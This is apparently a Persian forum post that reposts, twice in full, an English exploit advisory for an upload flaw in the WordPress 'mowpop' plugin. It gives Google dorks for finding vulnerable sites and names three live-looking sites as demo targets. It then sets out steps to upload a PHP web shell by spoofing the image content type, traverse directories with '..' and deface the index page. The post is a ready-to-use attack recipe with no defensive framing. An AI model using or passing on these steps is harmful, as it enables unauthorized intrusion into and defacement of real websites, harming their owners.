باگهای اپلودر وورد پرس معمولا تو پلاگینش زیادن یکیش این mow pop هست
دورک
کد PHP: [align=LEFT] inurl:mow pop
[/align] یا
کد PHP: inurl:wp-content/plugins/mowpop/submit.php
##################################################
# Exploit Title: [ [MOWPOP] Plugin WP-CONTENT In WordPress Upload Exploitation]
# Date: [03-04-2012]
# Author: [ Hacker-Fire ]
# Category:: [ webapps]
# Google dork: [inurl:mowpop]
# Greetz Milw0rm : 1337day.com
# Demo site:
[1-http://www.updatedeinleben.com/wp-content/plugins/mowpop/submit.php]
[2-http://my-air-conditioner.com/wp-content/plugins/mowpop/submit.php]
[3-http://jennysweets.com/blog/wp-content/plugins/mowpop/submit.php]
# Tested on: [Windows & Linux ]
##################################################
1- Go to a website with the google dork and modify all url (without domain) with “/wp-content/plugins/mowpop/submit.php”
2- Take your Shell.php in text fields.
3- Open Tamper Data or HTTP Live Header.
4- Capture or Alter the upload.
5- Modify the content type with: “image/gif”
6- Drag’n'drop the borken picture obtained in the url bar.
7- Go to the url.
8- Ascend to the index.php with “..” url.
9- Upload your deface
دورک
کد PHP: [align=LEFT] inurl:mow pop
[/align] یا
کد PHP: inurl:wp-content/plugins/mowpop/submit.php
##################################################
# Exploit Title: [ [MOWPOP] Plugin WP-CONTENT In WordPress Upload Exploitation]
# Date: [03-04-2012]
# Author: [ Hacker-Fire ]
# Category:: [ webapps]
# Google dork: [inurl:mowpop]
# Greetz Milw0rm : 1337day.com
# Demo site:
[1-http://www.updatedeinleben.com/wp-content/plugins/mowpop/submit.php]
[2-http://my-air-conditioner.com/wp-content/plugins/mowpop/submit.php]
[3-http://jennysweets.com/blog/wp-content/plugins/mowpop/submit.php]
# Tested on: [Windows & Linux ]
##################################################
1- Go to a website with the google dork and modify all url (without domain) with “/wp-content/plugins/mowpop/submit.php”
2- Take your Shell.php in text fields.
3- Open Tamper Data or HTTP Live Header.
4- Capture or Alter the upload.
5- Modify the content type with: “image/gif”
6- Drag’n'drop the borken picture obtained in the url bar.
7- Go to the url.
8- Ascend to the index.php with “..” url.
9- Upload your deface